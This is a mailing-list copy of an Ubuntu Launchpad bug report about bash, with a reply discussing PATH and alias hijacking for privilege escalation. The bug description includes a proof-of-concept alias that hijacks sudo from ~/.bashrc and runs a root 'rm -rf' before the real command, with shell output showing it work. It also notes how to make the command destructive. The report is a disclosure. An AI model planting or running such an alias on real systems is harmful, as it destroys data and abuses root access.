[Bug 1893241] Re: attack alias sudo with nasty payload

Patrik Nilsson 1893241 at bugs.launchpad.net
Sat Aug 29 20:25:53 UTC 2020 

@seth-arnold

I agree with you that there are other things to address as well.

In the art of hacking you most probably get into a system via some kind
of service. You maybe have the privileges of a daemon. You then get an
access to the first user account. You want to escalate privilege and you
search to find weaknesses. As a system owner you want as many layers of
protection as possible.

It is a weakness that the PATH-variable can be set without given your
password, since an attacker can set their evil command before the one
you expect in the execution priority.

The same comes to the ALIAS-command. As demonstrated, they can help
compromise your system.

So you are right there were more things to think about, but we all want
a system as safe as possible.

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1893241

Title:
  attack alias sudo with nasty payload

Status in bash package in Ubuntu:
  Won't Fix

Bug description:
  Put the alias below in ~/.bashrc, which is writable by the current
  user and wait for the user to open up a shell and become root.

  There are numerous of possibilities. If you exchange
  "/tmp/aBSoLuTLYNoTHiNG" to "/" it becomes dangerous. Or imagine an
  attacker that can't become a root in any other way and wants to setup
  a botnet.

  $ alias sudo='function f() { sudo -- rm -rf  "/tmp/aBSoLuTLYNoTHiNG" ; sudo touch "/tmp/aBSoLuTLYNoTHiNG" ; echo "Everything removed!!" ;  sudo "$@" ; } ; f "$@"'
  $ stat /tmp/aBSoLuTLYNoTHiNG 
  stat: cannot stat '/tmp/aBSoLuTLYNoTHiNG': No such file or directory
  $ sudo echo 'hello wonderful world!'
  Everything removed!!
  hello wonderful world!
  $ stat /tmp/aBSoLuTLYNoTHiNG 
    File: /tmp/aBSoLuTLYNoTHiNG
    Size: 0         	Blocks: 0          IO Block: 4096   regular empty file
  Device: fd00h/64768d	Inode: 4718664     Links: 1
  Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
  Access: 2020-08-27 18:09:50.960080579 +0200
  Modify: 2020-08-27 18:09:50.960080579 +0200
  Change: 2020-08-27 18:09:50.960080579 +0200
   Birth: -

  File written by root! Fastest fix: Sudo is not allowed to be an alias.

  Extra information:
  $ lsb_release -rd
  Description:	Ubuntu 20.04.1 LTS
  Release:	20.04

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1893241/+subscriptions

More information about the foundations-bugs mailing list